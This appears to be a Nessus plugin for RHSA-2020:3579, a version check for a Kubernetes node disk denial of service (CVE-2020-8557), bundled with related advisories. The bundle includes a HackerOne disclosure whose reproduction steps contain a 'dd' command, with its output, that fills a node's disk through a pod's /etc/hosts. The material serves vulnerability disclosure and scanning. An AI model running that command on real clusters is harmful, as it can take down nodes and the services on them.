ID REDHAT-RHSA-2020-3579.NASL Type nessus Reporter This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2020-09-01T00:00:00
Description
The remote Redhat Enterprise Linux 7 / 8 host has a package installed that is affected by a vulnerability as referenced
in the RHSA-2020:3579 advisory.
kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version
number.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2020:3579. The text
# itself is copyright (C) Red Hat, Inc.
#
include('compat.inc');
if (description)
{
script_id(140129);
script_version("1.2");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/09/02");
script_cve_id("CVE-2020-8557");
script_xref(name:"RHSA", value:"2020:3579");
script_name(english:"RHEL 7 / 8 : OpenShift Container Platform 4.4.19 openshift (RHSA-2020:3579)");
script_summary(english:"Checks the rpm output for the updated package");
script_set_attribute(attribute:"synopsis", value:
"The remote Red Hat host is missing a security update.");
script_set_attribute(attribute:"description", value:
"The remote Redhat Enterprise Linux 7 / 8 host has a package installed that is affected by a vulnerability as referenced
in the RHSA-2020:3579 advisory.
- kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version
number.");
script_set_attribute(attribute:"see_also", value:"https://cwe.mitre.org/data/definitions/400.html");
script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/CVE-2020-8557");
script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2020:3579");
script_set_attribute(attribute:"see_also", value:"https://bugzilla.redhat.com/1835977");
script_set_attribute(attribute:"solution", value:
"Update the affected openshift-hyperkube package.");
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-8557");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_cwe_id(400);
script_set_attribute(attribute:"vuln_publication_date", value:"2020/07/23");
script_set_attribute(attribute:"patch_publication_date", value:"2020/09/01");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/09/01");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:openshift:4.4");
script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:openshift:4.4::el7");
script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:openshift:4.4::el8");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:8");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Red Hat Local Security Checks");
script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
exit(0);
}
include('audit.inc');
include('global_settings.inc');
include('misc_func.inc');
include('rpm.inc');
if (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item('Host/RedHat/release');
if (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');
os_ver = os_ver[1];
if (! preg(pattern:"^(7|8)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);
if (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item('Host/cpu');
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ('x86_64' >!< cpu && cpu !~ "^i[3-6]86$" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);
pkgs = [
{'reference':'openshift-hyperkube-4.4.0-202008250319.p0.git.0.d653415.el7', 'cpu':'s390x', 'release':'7'},
{'reference':'openshift-hyperkube-4.4.0-202008250319.p0.git.0.d653415.el7', 'cpu':'x86_64', 'release':'7'},
{'reference':'openshift-hyperkube-4.4.0-202008250319.p0.git.0.d653415.el8', 'cpu':'s390x', 'release':'8'},
{'reference':'openshift-hyperkube-4.4.0-202008250319.p0.git.0.d653415.el8', 'cpu':'x86_64', 'release':'8'}
];
flag = 0;
foreach package_array ( pkgs ) {
reference = NULL;
release = NULL;
sp = NULL;
cpu = NULL;
el_string = NULL;
rpm_spec_vers_cmp = NULL;
epoch = NULL;
allowmaj = NULL;
if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];
if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];
if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];
if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];
if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];
if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];
if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];
if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];
if (reference && release) {
if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;
}
}
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_NOTE,
extra : rpm_report_get() + redhat_report_package_caveat()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'openshift-hyperkube');
}
{"id": "REDHAT-RHSA-2020-3579.NASL", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.4.19 openshift (RHSA-2020:3579)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has a package installed that is affected by a vulnerability as referenced\nin the RHSA-2020:3579 advisory.\n\n - kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2020-09-01T00:00:00", "modified": "2020-09-01T00:00:00", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/140129", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2020-8557", "https://access.redhat.com/errata/RHSA-2020:3579", "https://cwe.mitre.org/data/definitions/400.html", "https://bugzilla.redhat.com/1835977"], "cvelist": ["CVE-2020-8557"], "type": "nessus", "lastseen": "2020-09-14T18:19:46", "edition": 2, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-8557"]}, {"type": "redhat", "idList": ["RHSA-2020:3809", "RHSA-2020:3808", "RHSA-2020:3519", "RHSA-2020:3520", "RHSA-2020:3579", "RHSA-2020:3580"]}, {"type": "hackerone", "idList": ["H1:867699"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5767", "ELSA-2020-5765", "ELSA-2020-5766"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2020-3519.NASL", "REDHAT-RHSA-2020-3808.NASL", "PHOTONOS_PHSA-2020-2_0-0285_KUBERNETES.NASL", "PHOTONOS_PHSA-2020-3_0-0142_KUBERNETES.NASL"]}], "modified": "2020-09-14T18:19:46", "rev": 2}, "score": {"value": 4.6, "vector": "NONE", "modified": "2020-09-14T18:19:46", "rev": 2}, "vulnersScore": 4.6}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:3579. The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140129);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/02\");\n\n script_cve_id(\"CVE-2020-8557\");\n script_xref(name:\"RHSA\", value:\"2020:3579\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.4.19 openshift (RHSA-2020:3579)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has a package installed that is affected by a vulnerability as referenced\nin the RHSA-2020:3579 advisory.\n\n - kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/400.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8557\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:3579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1835977\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openshift-hyperkube package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8557\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(400);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(7|8)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\npkgs = [\n {'reference':'openshift-hyperkube-4.4.0-202008250319.p0.git.0.d653415.el7', 'cpu':'s390x', 'release':'7'},\n {'reference':'openshift-hyperkube-4.4.0-202008250319.p0.git.0.d653415.el7', 'cpu':'x86_64', 'release':'7'},\n {'reference':'openshift-hyperkube-4.4.0-202008250319.p0.git.0.d653415.el8', 'cpu':'s390x', 'release':'8'},\n {'reference':'openshift-hyperkube-4.4.0-202008250319.p0.git.0.d653415.el8', 'cpu':'x86_64', 'release':'8'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'openshift-hyperkube');\n}\n\n\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "140129", "cpe": ["cpe:/a:redhat:openshift:4.4", "cpe:/a:redhat:openshift:4.4::el7", "cpe:/a:redhat:openshift:4.4::el8", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "cpe:/o:redhat:enterprise_linux:8"], "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "scheme": null}
{"cve": [{"lastseen": "2020-12-09T22:03:18", "description": "The Kubernetes kubelet component in versions 1.1-1.16.12, 1.17.0-1.17.8 and 1.18.0-1.18.5 do not account for disk usage by a pod which writes to its own /etc/hosts file. The /etc/hosts file mounted in a pod by kubelet is not included by the kubelet eviction manager when calculating ephemeral storage usage by a pod. If a pod writes a large amount of data to the /etc/hosts file, it could fill the storage space of the node and cause the node to fail.", "edition": 9, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-07-23T17:15:00", "title": "CVE-2020-8557", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8557"], "modified": "2020-08-21T10:15:00", "cpe": [], "id": "CVE-2020-8557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8557", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": []}], "redhat": [{"lastseen": "2020-08-24T16:06:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8557"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-08-24T19:03:09", "published": "2020-08-24T19:02:11", "id": "RHSA-2020:3520", "href": "https://access.redhat.com/errata/RHSA-2020:3520", "type": "redhat", "title": "(RHSA-2020:3520) Moderate: OpenShift Container Platform 4.5.7 openshift-enterprise-hyperkube-container security update", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-01T20:09:06", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8557"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-09-01T22:41:34", "published": "2020-09-01T22:32:13", "id": "RHSA-2020:3579", "href": "https://access.redhat.com/errata/RHSA-2020:3579", "type": "redhat", "title": "(RHSA-2020:3579) Moderate: OpenShift Container Platform 4.4.19 openshift security update", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-01T20:08:35", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8557"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-09-01T22:51:02", "published": "2020-09-01T22:50:12", "id": "RHSA-2020:3580", "href": "https://access.redhat.com/errata/RHSA-2020:3580", "type": "redhat", "title": "(RHSA-2020:3580) Moderate: OpenShift Container Platform 4.4.19 openshift-enterprise-hyperkube-container security update", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-23T15:45:20", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8557", "CVE-2020-9283"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allowed for panic (CVE-2020-9283)\n\n* kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-09-23T18:09:45", "published": "2020-09-23T18:08:44", "id": "RHSA-2020:3809", "href": "https://access.redhat.com/errata/RHSA-2020:3809", "type": "redhat", "title": "(RHSA-2020:3809) Moderate: OpenShift Container Platform 4.3.38 container image security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-08-24T16:07:22", "bulletinFamily": "unix", "cvelist": ["CVE-2020-2220", "CVE-2020-2221", "CVE-2020-2222", "CVE-2020-2223", "CVE-2020-8557"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nJenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.\n\nSecurity Fix(es):\n\n* jenkins: Stored XSS vulnerability in job build time trend (CVE-2020-2220)\n\n* jenkins: Stored XSS vulnerability in upstream cause (CVE-2020-2221)\n\n* jenkins: Stored XSS vulnerability in 'keep forever' badge icons (CVE-2020-2222)\n\n* jenkins: Stored XSS vulnerability in console links (CVE-2020-2223)\n\n* kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-08-24T18:43:03", "published": "2020-08-24T18:33:15", "id": "RHSA-2020:3519", "href": "https://access.redhat.com/errata/RHSA-2020:3519", "type": "redhat", "title": "(RHSA-2020:3519) Important: OpenShift Container Platform 4.5.7 jenkins and openshift packages security update", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2020-10-15T00:03:32", "bulletinFamily": "unix", "cvelist": ["CVE-2019-17638", "CVE-2020-2220", "CVE-2020-2221", "CVE-2020-2222", "CVE-2020-2223", "CVE-2020-2229", "CVE-2020-2230", "CVE-2020-2231", "CVE-2020-8557"], "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nJenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.\n\nSecurity Fix(es):\n\n* jenkins: Stored XSS vulnerability in job build time trend (CVE-2020-2220)\n\n* jenkins: Stored XSS vulnerability in upstream cause (CVE-2020-2221)\n\n* jenkins: Stored XSS vulnerability in 'keep forever' badge icons (CVE-2020-2222)\n\n* jenkins: Stored XSS vulnerability in console links (CVE-2020-2223)\n\n* kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-10-15T03:14:07", "published": "2020-09-23T16:37:44", "id": "RHSA-2020:3808", "href": "https://access.redhat.com/errata/RHSA-2020:3808", "type": "redhat", "title": "(RHSA-2020:3808) Important: OpenShift Container Platform 4.3.38 jenkins and openshift security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2020-07-29T08:50:41", "bulletinFamily": "bugbounty", "bounty": 1000.0, "cvelist": ["CVE-2020-8557"], "description": "Report Submission Form\n\n## Summary:\nPod files /etc/hosts, /etc/hostname, /etc/resolve.conf are not readonly.\nA normal pod running in kubernetes cluster can kil a host through write data to /etc/hosts.\nNot only /etc/hosts, but also /etc/resolve.conf and /etc/hostname can do this.\n\n## Kubernetes Version:\n<=1.18\n\n## Component Version:\nDocker 19.03\n\n## Steps To Reproduce:\n\n 1. use kubectl create a pod like kubectl run \n 2. run `kubectl exec -it $POD_NAME -- dd if=/dev/zero of=/etc/hosts count=1000000 bs=10M`\n 3. run `df -h /var/lib/kubelet` on host that pod running, you can see the disk avaliable space are decreasing until the disk full.\n\n## Supporting Material/References:\n```console\n[root@kebe-sm-315 ~]# kubectl exec -it rate-c848c5c8b-5b8vm sh\nkubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl kubectl exec [POD] -- [COMMAND] instead.\nDefaulting container name to rate.\nUse 'kubectl describe pod/rate-c848c5c8b-5b8vm -n default' to see all of the containers in this pod.\n/ # df -h\nFilesystem Size Used Available Use% Mounted on\n/dev/mapper/docker-8:16-67108930-710dfe5c781bd17e11968371b9d0f84641a2efde95c68a47eddf9ae518e768d1\n 10.0G 40.3M 10.0G 0% /\ntmpfs 64.0M 0 64.0M 0% /dev\ntmpfs 9.7G 0 9.7G 0% /sys/fs/cgroup\n/dev/mapper/centos-root\n 53.0G 28.6G 24.4G 54% /dev/termination-log\n/dev/sdb 100.0G 40.9G 59.1G 41% /etc/resolv.conf\n/dev/sdb 100.0G 40.9G 59.1G 41% /etc/hostname\n/dev/mapper/centos-root\n 53.0G 28.6G 24.4G 54% /etc/hosts\nshm 64.0M 8.0K 64.0M 0% /dev/shm\ntmpfs 9.7G 12.0K 9.7G 0% /var/run/secrets/kubernetes.io/serviceaccount\ntmpfs 9.7G 0 9.7G 0% /proc/acpi\ntmpfs 64.0M 0 64.0M 0% /proc/kcore\ntmpfs 64.0M 0 64.0M 0% /proc/keys\ntmpfs 64.0M 0 64.0M 0% /proc/timer_list\ntmpfs 64.0M 0 64.0M 0% /proc/timer_stats\ntmpfs 64.0M 0 64.0M 0% /proc/sched_debug\ntmpfs 9.7G 0 9.7G 0% /proc/scsi\ntmpfs 9.7G 0 9.7G 0% /sys/firmware\n\n[root@kebe-sm-315 86aae92d-e0f2-4cf5-bb85-039b416f6b66]# ls -al\n\u603b\u7528\u91cf 12\ndrwxr-xr-x 5 root root 71 5\u6708 7 12:29 .\ndrwxr-x--- 50 root root 4096 5\u6708 7 12:29 ..\ndrwxr-x--- 5 root root 55 5\u6708 7 12:31 containers\n-rw-r--r-- 1 root root 270 5\u6708 7 12:31 etc-hosts\ndrwxr-x--- 3 root root 37 5\u6708 7 12:29 plugins\ndrwxr-xr-x 4 root root 65 5\u6708 7 12:29 volumes\n[root@kebe-sm-315 86aae92d-e0f2-4cf5-bb85-039b416f6b66]# kubectl exec -it rate-c848c5c8b-5b8vm -- dd if=/dev/zero of=/etc/hosts count=100 bs=1M\nDefaulting container name to rate.\nUse 'kubectl describe pod/rate-c848c5c8b-5b8vm -n default' to see all of the containers in this pod.\n100+0 records in\n100+0 records out\n[root@kebe-sm-315 86aae92d-e0f2-4cf5-bb85-039b416f6b66]# ls -al\n\u603b\u7528\u91cf 102408\ndrwxr-xr-x 5 root root 71 5\u6708 7 12:29 .\ndrwxr-x--- 50 root root 4096 5\u6708 7 12:29 ..\ndrwxr-x--- 5 root root 55 5\u6708 7 12:31 containers\n-rw-r--r-- 1 root root 104857600 5\u6708 7 15:06 etc-hosts\ndrwxr-x--- 3 root root 37 5\u6708 7 12:29 plugins\ndrwxr-xr-x 4 root root 65 5\u6708 7 12:29 volumes\n```\n\n * [attachment / reference]\n\n## Impact\n\nIf someone create a pod on a public cloud with kubernetes, the host of the provider may panic due to disk full.", "modified": "2020-07-22T01:34:00", "published": "2020-05-07T07:11:29", "id": "H1:867699", "href": "https://hackerone.com/reports/867699", "type": "hackerone", "title": "Kubernetes: Node disk DOS by writing to container /etc/hosts", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2020-07-28T11:33:46", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8557", "CVE-2020-8559"], "description": "[1.12.10-1.0.13]\n- CVE-2020-8559: Privilege escalation from compromised node to cluster\n- CVE-2020-8557: Node disk DOS by writing to container /etc/hosts", "edition": 2, "modified": "2020-07-22T00:00:00", "published": "2020-07-22T00:00:00", "id": "ELSA-2020-5767", "href": "http://linux.oracle.com/errata/ELSA-2020-5767.html", "title": "kubernetes security update", "type": "oraclelinux", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-07-28T11:33:39", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8557", "CVE-2020-0543", "CVE-2020-2026", "CVE-2020-8559", "CVE-2020-2024", "CVE-2020-2023", "CVE-2020-2025"], "description": "kernel-uek-container\n[4.14.35-1902.303.5.3.el7]\n- rds: Deregister all FRWR mr with free_mr (Hans Westgaard Ry) [Orabug: 31476202]\n- Revert 'rds: Do not cancel RDMAs that have been posted to the HCA' (Gerd Rausch) [Orabug: 31475329]\n- Revert 'rds: Introduce rds_conn_to_path helper' (Gerd Rausch) [Orabug: 31475329]\n- Revert 'rds: Three cancel fixes' (Gerd Rausch) [Orabug: 31475318]\n[4.14.35-1902.303.5.2.el7]\n- rds: Three cancel fixes (Hakon Bugge) [Orabug: 31463014]\n[4.14.35-1902.303.5.1.el7]\n- x86/speculation: Add SRBDS vulnerability and mitigation documentation (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/speculation: Add Special Register Buffer Data Sampling (SRBDS) mitigation (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/cpu: Add 'table' argument to cpu_matches() (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/cpu: Add a steppings field to struct x86_cpu_id (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n[4.14.35-1902.303.5.el7]\n- net/mlx5: Decrease default mr cache size (Artemy Kovalyov) [Orabug: 